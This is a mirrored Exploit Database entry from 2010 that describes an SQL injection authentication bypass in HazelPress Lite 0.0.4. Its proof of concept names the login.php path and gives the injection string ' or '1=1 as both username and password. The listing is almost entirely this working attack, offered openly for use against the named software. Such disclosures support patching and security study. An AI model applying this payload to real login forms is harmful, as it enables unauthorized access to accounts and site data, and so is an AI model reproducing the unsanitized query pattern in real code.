HazelPress Lite 0.0.4 – Authentication Bypass

• Exploit Database
• 89 阅读

• 作者： cr4wl3r
  日期： 2010-02-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11602/

• # HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
  # By cr4wl3r
  # Download: http://hazelpress.org/index.php?hazel=downloads
  
  # PoC: [path]/login.php
  
  # Username: ' or '1=1
  # password: ' or '1=1